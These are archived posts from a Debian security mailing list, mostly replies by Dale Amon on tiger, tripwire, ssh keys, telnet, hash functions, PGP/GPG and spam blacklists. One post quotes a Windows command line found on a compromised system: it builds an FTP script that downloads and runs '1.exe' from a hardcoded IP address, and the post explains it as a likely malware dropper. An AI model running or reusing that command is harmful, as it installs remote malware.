Re: Tiger, dirvish and dangling symlinks
On Mon, Sep 28, 2009 at 01:12:31AM +0200, Javier Fernández-Sanguino Peña wrote: > On Tue, Sep 01, 2009 at 08:53:34PM +0100, Dale Amon wrote: > > So is there a way to simply tell tiger to not look > > at certain disk drives? It seems rather silly to have > > it wasting time processing 30-40TB of backups when all > > that is needed is to monitor the actual system disks. > > IIRC You can use the Tiger_FSScan_NonLocal variable to have Tiger skip those > filesystems that are not considered "local" or you can disable (in > /etc/tiger/cronrc) the checks that will process the filesystem starting from > / (check_perms, find_files, check_devices > > Regards > > Javier Thanks. I'll look into that! signature.asc Description: Digital signature
Tiger, dirvish and dangling symlinks
I am working on a backup box with a huge disk capacity that is being used as a dirvish incremental backup for a bunch of systems. This of course means there are just thousands upon thousands of 'apparently' danglying symlinks since the backups are 'out of context' as it were. This causes tiger to output useless emails about them and waste space in security logs about them. So is there a way to simply tell tiger to not look at certain disk drives? It seems rather silly to have it wasting time processing 30-40TB of backups when all that is needed is to monitor the actual system disks. Ad Astra, Dale Amon signature.asc Description: Digital signature
Re: Time to replace MD5?
On Tue, Jun 12, 2007 at 07:39:38PM -0400, Joey Hess wrote: > Bernd Eckenfels wrote: > > Because open source is all about choice. > > So it's there because of a platitude? > > > There might be admins using dpkg -i > > or security officers who build their local mirrors manually. > > Then why don't we include md5sums and wget commands for all packages in > stable point release annoucements? Why not include them in major release > announcements too? Or are these things somehow less "all about choice"? Yes, there are a lot of us who use dpkg -i, and do it very often. I may be missing something in this thread because it seems to blatently obvious to me that this is a necessary and important tool that I am having difficulty understanding where this is going. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: spooky windows script
On Tue, May 08, 2007 at 02:57:24PM +0200, Jan Outhuis wrote: > %systemroot%\system32\cmd.exe > cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik &echo > get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit If you were running a windows system this might do something really nasty since it creates a download script and executes it. Perhaps to pull in a root kit?. I haven't done DOS in a long time so I am a bit shaky in fully interpreting. Check for something named 1.exe in your directory. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: [OT] Re: email notifications when users login
On Thu, Sep 21, 2006 at 03:37:56PM -0400, Morgan Walker wrote: > > Thanks Michelle that worked perfect. Is there an easy variable I could > throw in there that you know off hand which would include the time > (MM/DD/) as well? TIME=`date +%m/%d/%Y` -- -- Artemis Systems Development Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: serious bug / 1.7.8-1sarge7.2.1_i386 / URGENT
On Tue, Sep 05, 2006 at 01:04:40AM +0200, Von Wolher wrote: > Thank you very much for the lightspeed reaction and fix !!! > I'll set those extra lines in the sources.list of a few general use > boxes which also run pure debian sarge and will keep you updated in case > an updated doesn't workout. Perhaps I am not the only one who has seen problems in recent firefox updates then... I can reliably crash my firefox browser simply by going to google maps. It starts loading the map... and then falls over. -- -- Artemis Systems Development Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- signature.asc Description: Digital signature
Re: closing unwanted ports - and what is 1720/tcp filtered H.323/Q.931
On Thu, Dec 15, 2005 at 12:35:09PM +, kevin bailey wrote: > what is > 1720/tcp filtered H.323/Q.931 Are you running any VOIP? H323 is the standard for telephone interchanges. > and how do i turn it off if it is uneccessary. netstat, lsof, fuser, the usual suspects... -- -- Artemis Systems Development Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- signature.asc Description: Digital signature
Re: hardening checkpoints
On Thu, Dec 15, 2005 at 12:27:01PM +, kevin bailey wrote: > 2. firewall > not i'm not sure about the need for a firewall - i may need to access the > server over ssh from anywhere. also, to run FTP doesn't the server need to > be able to open up a varying number of ports. There is a way around this. If you are really worried about a mistake, use 'at' to turn the firewall off after 5 minutes. That way you can set up your test and if you screwed up you only have to wait a few min before it goes away. If it worked, you just kill the queued at command line. -- -- Artemis Systems Development Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- signature.asc Description: Digital signature
Re: What is a security bug?
On Wed, Nov 23, 2005 at 11:10:25PM -0800, Thomas Bushnell BSG wrote: > It seems it does not save form entries (which was not mentioned > explicitly in Florian's post above), but it certainly does save the > tabs and multiple windows information and such. Galeon and firefox have *always* had this sort of crash problem. It is especially apparent when printing ps to file. There are some **major** sites which will reliably crash your browser. -- -- Artemis Systems Development Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: On Mozilla-* updates
On Mon, Aug 01, 2005 at 09:29:24AM +0200, Stefano Salvi wrote: > I think that two kinds of people are interested in Debian: > - Ones who want Security > - Ones who want Stability While not an unreasonable part of an analysis, I would posit these are at least second level criteria for systems users. The most important factor for anyone in a corporate environment, (and for many in a home environment as well), is "Does Debian allow me to get my work done faster and more efficiently?" Issues of security, package content, stability and such are imperfect tradeoffs towards fulfilling that goal. -- ------ Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- signature.asc Description: Digital signature
Re: My machine was hacked - possibly via sshd?
On Mon, Mar 28, 2005 at 12:37:46PM -0800, Alvin Oga wrote: > > When I logged on I discovered two outgoing connections to port ircd on > > the foreign hosts, and some thing listening on port 48744 TCP. > > sorta harmless ... script kiddies having fun Does not sound like it. I would say it was a trojan calling home for orders. The criminal gangs tend to use irc for botnet control. -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- signature.asc Description: Digital signature
Spamassassin slowdown?
Has anyone noticed a big slow down in spam assassin? I know it is no speed demon in the best of times, but I have started seeing huge loads and am modifying my exim4.conf to send fewer files through it... just so I can receive email again. The problem began just a couple of days ago, I believe not long after the last dselect update I did... My poor little server is on its knees crying in pain. Very sad sight. :-( -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- signature.asc Description: Digital signature
Re: A tripwire annoyance
On Wed, Oct 06, 2004 at 10:56:53AM -0400, Noah Meyerhans wrote: > On Wed, Oct 06, 2004 at 02:53:19PM +0100, Dale Amon wrote: > > I've been running tripwire on a particular server > > for some years and finally got annoyed at skimming through > > the large reports, so I began an update... After 24 hours > > I thought it was hung and killed it. I restarted it > > with verbose and found that it is indeed working. And > > just for the hell of it, I've left it running to see > > how long it would take. > > Which version of tripwire is this? It sounds like behavior I'd expect > to see with the ancient ancient ancient version that we shipped prior to > woody (there is no tripwire in woody), but I've never seen anything like > that with tripwire 2+. > > How did you perform this update? The "right way" to do it is to do > 'tripwire -m u ', which doesn't actually look at the > filesystem at all but simply merges the filesystem data contained in the > report into the database. > > noah > I usually do this: tripwire --update -V emacs -Z high -r /var/lib/tripwire/report/--.twr but the second run through I had already looked over the file so I did this: tripwire -v -a -r /var/lib/tripwire/report/--.twr -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- signature.asc Description: Digital signature
A tripwire annoyance
I've been running tripwire on a particular server for some years and finally got annoyed at skimming through the large reports, so I began an update... After 24 hours I thought it was hung and killed it. I restarted it with verbose and found that it is indeed working. And just for the hell of it, I've left it running to see how long it would take. It has been running for 10 days now, and almost entirely within the /var/log/snort directory. Has anyone else had problems with tripwire and snort together on a box on an ISP backbone (ie lots of snort files)? I've been considering stopping it and fiddling with the config, but first... I'm curious if I am alone in this problem. -- ------ Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- signature.asc Description: Digital signature
Re: [OT] Collective memory query
On Mon, Sep 27, 2004 at 10:04:00PM +1000, Andrew McGlashan wrote: > Try again: > http://packages.debian.org/testing/utils/rpl > "Intelligent recursive search/replace utility" Thanks much. I do believe that is the one. *amon runs off to dselect yet again... -- ------ Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- signature.asc Description: Digital signature
[OT] Collective memory query
A couple years ago I ran across a sed like program that will recursively descend through a tree and apply specified edits in place. I have searched my notes, gone through the deb available and have not been able to find it. Might just have been something on SourceForge... Has anyone else run across a program of this nature? -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- signature.asc Description: Digital signature
Re: telnetd vulnerability from BUGTRAQ
On Sat, Sep 25, 2004 at 10:34:43AM -0500, hanasaki wrote: > Jan Minar wrote: > >On Fri, Sep 24, 2004 at 04:15:09PM -0600, s. keeling wrote: > >>Is anyone still using telnet when there's ssh? Why? I wouldn't even > >>use it inside my own firewalled LAN. ssh is just better. > >I've been told telnet *does* make a lot of sense where IPSEC is set up. > > When IPSEC is being used, telnet works the same; however is secure > because it, like all traffic, is sent over a transparent tunnel. One very good reason to avoid it even in tunnels is that you get into bad habits. One tired night you forget and connect over an unsecured link to a key machine... and you're toast. -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- signature.asc Description: Digital signature
Re: telnetd vulnerability from BUGTRAQ
On Sat, Sep 25, 2004 at 08:28:13AM +1000, Matthew Palmer wrote: > Cisco gear contains the Debian telnetd? And if that's true, how would us > releasing a DSA for it necessarily help all the Cisco routers out there. > We're not talking about the general intelligence of using telnet (or, at > least, that wasn't the initial topic of discussion), but rather the > possibility of fixing security problems in the stock telnetd in Debian. The question asked was "why is anyone still using telnet when there is ssh". And I would say that Cisco and some other gear are about the only reasons why anyone would still make a connection with the telnet protocol (other than for testing odd things... I used to use 'telnet foo 110' to hand test my company pop server when someone had problems. So no, I was not replying about Debian fixes, I was replying to the general question of 'why telnet at all'. -- ------ Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- signature.asc Description: Digital signature
Re: telnetd vulnerability from BUGTRAQ
On Fri, Sep 24, 2004 at 04:15:09PM -0600, s. keeling wrote: > Is anyone still using telnet when there's ssh? Why? I wouldn't even > use it inside my own firewalled LAN. ssh is just better. Unfortuneately if you use Cisco gear you are pretty much stuck. Some of the older stuff just doesn't have the mips to deal with it even if installed and I believe Cisco charges an arm and a leg for the upgrade. I've never had a Cisco with it installed. So use, if you work with routers, you are stuck. -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- signature.asc Description: Digital signature
Re: ssh publickey auth
On Tue, Sep 14, 2004 at 05:06:59PM +0200, Fox wrote: > Le Tue, Sep 14, 2004 at 04:01:57PM +0100, Dale Amon ecrivait: > > Failed to add the host to the list of known hosts (/user1/.ssh/known_hosts). > > Don't you see any problem here ? It was a symptom which I mistook for something else entirely since I was still able to log in with a password. It's the client side protections. I was blindly focusing on the server side. -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- signature.asc Description: Digital signature
Re: ssh publickey auth
On Tue, Sep 14, 2004 at 04:05:23PM +0100, Jan Eringa wrote: > The newer versions of SSH(d) are very strict about > the file permisions on the .ssh directory & the publick key pair Yes, I spotted that just after I sent a reply. That fixed the problem. -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- signature.asc Description: Digital signature
Re: ssh publickey auth
rinfo for scout.islandone.org failed - POSSIBLE BREAKIN ATTEMPT! debug1: PAM: setting PAM_RHOST to "10.0.0.25" debug1: PAM: setting PAM_TTY to "ssh" debug1: temporarily_use_uid: 1008/1008 (e=0/0) debug1: trying public key file /user1/.ssh/authorized_keys debug1: matching key found: file /user1/.ssh/authorized_keys, line 1 Found matching DSA key: ee:c5:7d:12:df:db:e7:d6:aa:43:17:c0:19:e0:a0:35 debug1: restore_uid: 0/0 Postponed publickey for user1 from 10.0.0.25 port 2743 ssh2 debug1: userauth-request for user user1 service ssh-connection method keyboard-interactive debug1: attempt 2 failures 1 debug1: keyboard-interactive devs debug1: auth2_challenge: user=user1 devs= debug1: kbdint_alloc: devices 'pam' debug1: auth2_challenge_start: trying authentication method 'pam' Postponed keyboard-interactive for user1 from 10.0.0.25 port 2743 ssh2 Connection closed by 10.0.0.25 And yes, there are some things on my test lan's dns that need sorted :-) I might add that the target machine is a testbed with sarge-di installed about a week or two ago and then updated and added to via dselect. So it is really bog-standard debian. -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- signature.asc Description: Digital signature
Re: ssh publickey auth
On Tue, Sep 14, 2004 at 04:08:17PM +0200, Oliver Hitz wrote: > It is possible that public key authentication is disabled in > /etc/ssh/sshd_config. Check that you have "PubkeyAuthentication yes" in > said file. Double checked. It is 'yes' on the server, target host sshd_config. According to docs it is the default for the client ssh_config which is 'out of the box' debian with everything defaulted. -- ------ Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- signature.asc Description: Digital signature
ssh publickey auth
I've an application that needs a secure automatic login from an application program, between particular accounts on particular machines. I know this used to work (a few years ago!) but I am having difficulty this time around getting it going. I'm using a public key for the connection, with null password given when asked by the ssh-keygen. The destination machine accepts that the publickey is valid but asks for a passphrase nonetheless. It doesn't accept a return for null password either, it falls back on normal password log in. As I said, I've not done this particular set up in, oh, 6 years, so I would not be surprised if there were changes in the debian defaults for sshd, pamd, the way ssh handles things etc, etc. A suggestion or three would be appreciated. -- ------ Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- signature.asc Description: Digital signature
PGP vs GPG
Hmmm... We were just talking about this key compatibility issue a couple weeks ago. Is there something special you have to do in Debian to import PGP keys? Didn't the RSA patent expire already? gpg --import < amon.pub gpg: key 42F4CD71: public key "Dale Amon (office) <[EMAIL PROTECTED]>" imported gpg: Total number processed: 1 gpg: imported: 1 gpg --import < gary.pub gpg: no valid OpenPGP data found. gpg: Total number processed: 0 cat gary.pub -BEGIN PGP SIGNATURE- Version: PGP Personal Privacy 6.5.8 -END PGP SIGNATURE- -- ------ Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: MD5 collisions found - alternative?
On Thu, Aug 26, 2004 at 01:04:21AM +0200, Almut Behrens wrote: > ...and I think somewhere in between lie hashing functions like crc32, > as used for detecting transmission errors, for example. Those are > not cryptographic, but possess a sufficiently large output space, so we > can expect few random collisions for most practical purposes. I wouldn't call CRC a hash code although you can use it that way I guess. It is really an error detecting and correction code that does have the ability, in a sense, to go backwards. It stands for Cyclic Redundancy Check. Such codes are redudant data, to be included with a transmission, not a hash. Some of them allow correction of multiple bit errors; typically you can detect 1 bit of error more than you can correct. > Right, but I believe that a uniform mapping _also_ is a desirable > property (besides speed, of course) of hashing functions as used to > compute table lookup indices -- as this property assures that the data > storage locations will be spread as evenly as possible across the > available buckets, which in turn minimizes the time spent on resolving > collisions (on average). And, as practical considerations in this case > always enforce a rather small output space (i.e. number of buckets) > we're certainly expecting collisions here. [1] Well, in theory yes. In practice you usually aren't much fussed if you've got a variance in the bucket utilization unless you're working on something with a real need for speed. For example, I would bet there are some really, really good uniform hash functions used inside of gcc. > > * randomness. Input strings which differ by 1 bit in any > > position generate hash keys a random distance apart > > I'd add: > * huge size of the output space (with its upper limit corresponding > to the number of bits of the hash value). The probability of > accidentally finding a collision is of course directly related to > the size of the output space (assuming a uniform mapping). Yes, can't argue there. That is where the basic difference between a typical hash function and a cryptographic hash comes. You want small keyspaces and very simple functions to generate lookup keys, whereas you don't much care about the function overhead for a cryptographic key as you tend not to do the encodings as often. > If anyone knows of any other requirements, please feel free to chime > in... Well, OTOH, this would probably be getting a little off-topic for > debian-security (especially the debian aspect). -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- signature.asc Description: Digital signature
Re: MD5 collisions found - alternative?
On Wed, Aug 25, 2004 at 06:02:22AM +0200, Almut Behrens wrote: > Somewhat more seriously: are there generally any defining criteria for > something one would call a 'hash function', saying that it always must > map some larger input space to some smaller output space? Yes. A hash function is any mapping function y = map(x) where the space y is smaller than the space x. Hashing (think of cornbeef hash with things all chopped up into bits) is a technique to generate fast lookup keys. The discussion here is about cryptographic hash functions. I believe the primary difference is that a cryptographic hash is: * a uniform mapping. For input space n and output space m, there are on average n/m strings with the same hash key. * randomness. Input strings which differ by 1 bit in any position generate hash keys a random distance apart While these features are also useful in writing assembler and compilers, they are not *that* important. I've often used hash functions as simple as: "add the first 8 chars and take the low byte of the integer summand." Obviously not cryptographic. -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: pgp in Debian: obsolete?
On Thu, Aug 05, 2004 at 11:40:09AM -0700, Rick Moen wrote: > > Keep in mind people may have encrypted files and email > > archived. The means of accessing archive data should > > be considered to be at least as immortal as the data > > itself. > > Aren't GnuPG's decryption/verification features a superset of those in > PGPi 5.0? That's not a rhetorical question: I've been telling people > that for years in a good faith effort at accuracy, and so will > appreciate any corrections. I don't know for sure either. I do seem to remember there was a document explaining how to transition and that there was a new key generation method. I also vaguely remember having some problem with my own package signing keys when the switch was made from PGP to GPG, but that is 4-5 years ago and I cannot for the life of me remember the details. I just have a vague disquiet about it. I'm certain that somewhere I've got files using the old keys, and since I'm in Ireland, Murphy will drop in for tea the day after PGP goes away... -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: pgp in Debian: obsolete?
On Thu, Aug 05, 2004 at 06:51:22PM +0100, Ian Beckwith wrote: > If there is a demand for it, is there any reason I shouldn't upgrade > to the package to the latest pgp? (6.5.8 I believe, assuming the > international pgp restrictions no longer apply). Keep in mind people may have encrypted files and email archived. The means of accessing archive data should be considered to be at least as immortal as the data itself. -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Exim security may be breaking some functionality
On Wed, Jul 14, 2004 at 09:57:01AM +0200, Florian Weimer wrote: > > Would someone concerned with exim packaging and > > security contact me directly? Exim4, but I've got the problem understood and sorted. Exim drops some privs during the time while it does verifies. Specifically, during a verify-only of mine in a router, accessed during the HELO. After discussion with Philip, I solved my problem by writing a client/server pair to handle my address verifies and call the client from Exim4. -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Mozilla/Firefox "PostScript/default" security problems
On Sat, Jul 10, 2004 at 12:47:18PM +0200, Magnus Therning wrote: > Yes. Printing PS to a file is still possible. Thanks. I had visions of all sorts of extra work in order to just stand still. Now I can forget about this and go back to writing my mail address verify daemon... -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Mozilla/Firefox "PostScript/default" security problems
On Fri, Jul 09, 2004 at 06:38:49PM -0500, Brad Sims wrote: > If you want postscript back; simply grab the source deb and roll your own; > just edit rules under the debian folder. Delete the '--with-xprint' and > '--disable-postscript' lines and do 'dpkg-buildpackage -rfakeroot'. However > I did give the debs a version number of 99 to keep apt from updating them > until there is a new mozilla version from upstream. I'd like a black and white clarification of the impact of the change so I know for certain whether to be incredibly pissed off at the packager or not: "If I were to dselect today, would I still be able to print to file a website page as ps?" [Y/N] I do this as a matter of course, every single day to archive data important to projects I work on. I don't have time to rebuild mozilla myself all the time, so if the answer to this is that I cannot... I have four choices in descending order of desirability: * find someone else with a repository that overrides it. * freeze forever / manually update selected packages. * abandon Debian mozilla * abandon Debian If it is true that someone out there is playing with things important to my means of making a living, I do not appreciate it in the least. -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Cite for print-to-postscript exploit in Mozilla?
On Fri, Jul 09, 2004 at 12:18:30PM -0300, Henrique de Moraes Holschuh wrote: > OTOH, maybe the postscript code in mozilla itself has a security hole. But > the right thing to do would be to *fix* that instead, not to drop it. Question: are you saying that Mozilla based browsers (eg Galeon) can now not print web pages to a postscript printer or have I missed something? If that is the case, I will not be doing a dselect for a very long time! Webpage printing is a nonnegotiable, mission critical tool in my Revenue Generating Activities... -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Exim security may be breaking some functionality
Would someone concerned with exim packaging and security contact me directly? I've got some issues that are a bit lengthy and specialized and probably of little interest to most. I believe something done recently may have caused some obscure breakage in queryprogram. Please RSVP at your earliest convenience... -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Why not push to stable?
On Sat, Jun 26, 2004 at 09:27:23PM +0200, Andreas Barth wrote: > * martin f krafft ([EMAIL PROTECTED]) [040626 15:55]: > > Note that I am not trying to undermine or criticise or change the > > Debian security policy. I just want to understand it. Let's say you have your own internal corporate release. You have a policy in place that requires you to be able to identify precisely what the internal state of your thousands of machines are. Or perhaps you are a facility that audits things and you do your own secret fixes (for instance if you were a government security agency). You want to at all times have a stable, known base to start from to apply *your own* fixes. You do not want stable to be changing underneath you every second day. If it does, you will go stark raving mad trying to keep your internal facilities and patches and applications synced. Debian is doing this the correct way. Stable is just what it says on the label: stable. It is a base you can build on and it won't change underneath you. -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: password managers
On Mon, Jun 14, 2004 at 02:56:15PM -0400, andrew lattis wrote: > what does everyone else use to keep track of all there passwords? Try gringotts. -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" --
Re: password managers
On Mon, Jun 14, 2004 at 02:56:15PM -0400, andrew lattis wrote: > what does everyone else use to keep track of all there passwords? Try gringotts. -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: rbl's status?
On Mon, Jun 14, 2004 at 04:57:42PM +1000, Russell Coker wrote: > relays.ordb.org, reject_rhsbl_client rhsbl.sorbs.net, reject_rhsbl_client > dsn.rfc-ignorant.org, reject_rhsbl_client postmaster.rfc-ignorant.org Just to publicly eat my previous words... I submitted the request, had a *person* respond within 5 minutes and removal is already in the queue. Amazing. -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" --
Re: rbl's status?
On Mon, Jun 14, 2004 at 04:57:42PM +1000, Russell Coker wrote: > a test message to [EMAIL PROTECTED] and it hasn't bounced yet... Maybe the > Yahoo abuse team are being butt-head's about clicking on the removal URL. Yeah, just I found I got listed by ignoramuses about RFC's due to a mail helper program crashing... -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" --
Re: rbl's status?
On Mon, Jun 14, 2004 at 04:57:42PM +1000, Russell Coker wrote: > relays.ordb.org, reject_rhsbl_client rhsbl.sorbs.net, reject_rhsbl_client > dsn.rfc-ignorant.org, reject_rhsbl_client postmaster.rfc-ignorant.org Just to publicly eat my previous words... I submitted the request, had a *person* respond within 5 minutes and removal is already in the queue. Amazing. -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: rbl's status?
On Mon, Jun 14, 2004 at 04:57:42PM +1000, Russell Coker wrote: > a test message to [EMAIL PROTECTED] and it hasn't bounced yet... Maybe the > Yahoo abuse team are being butt-head's about clicking on the removal URL. Yeah, just I found I got listed by ignoramuses about RFC's due to a mail helper program crashing... -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: rbl's status?
On Sun, Jun 13, 2004 at 06:33:13PM +0100, Adam D. Barratt wrote: > I'd guess that was easier than fixing all the references to the RBL[+], > RSS and DUL littered through the documentation. Point taken... but then again, who on Earth actually re-reads the whole doc a second time, rather than just a search for a specific keyword? I've tried a couple times. Puts me right to sleep :-) -- ------ Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" --
Re: rbl's status?
On Sun, Jun 13, 2004 at 07:46:15PM +0300, Vassilii Khachaturov wrote: > I believe it's very old news, smth like 4-5 years or so. I'd not thought about it because they are still used in the examples all over specs.txt. Perhaps I should email Philip about it. -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" --
Re: rbl's status?
On Sun, Jun 13, 2004 at 12:54:11PM -0400, Noah Meyerhans wrote: > On Sun, Jun 13, 2004 at 07:46:15PM +0300, Vassilii Khachaturov wrote: > > > What are the recommended rbl's these days? > > > > Best thing is ask on NANAE or exim-users or whatever your favourite MTA is. > > Here's what I am using here RBL-wise: > > > > rbl_domains = bl.spamcop.net/reject : > > relays.osirusoft.com/reject :spamhaus.relays.osirusoft.com/reject : > > sbl.spamhaus.org/reject > > You do realize that the osirusoft blacklists are defunct and have been > for several months, right? Basing your decision of whether or not to > accept mail from a given host based on an answer from a defunct > blacklist is probably not a good idea. At least he's more up to date than I! :-) -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" --
rbl's status?
I just noticed that my exim4 config access to rbl.mail-abuse.org is no longer valid. I'd heard Vixie had 'gone pro' but hadn't thought much about it. What are the recommended rbl's these days? -- -- Dale Amon [EMAIL PROTECTED]+44-7802-188325 International linux systems consultancy Hardware & software system design, security and networking, systems programming and Admin "Have Laptop, Will Travel" --
Re: rbl's status?
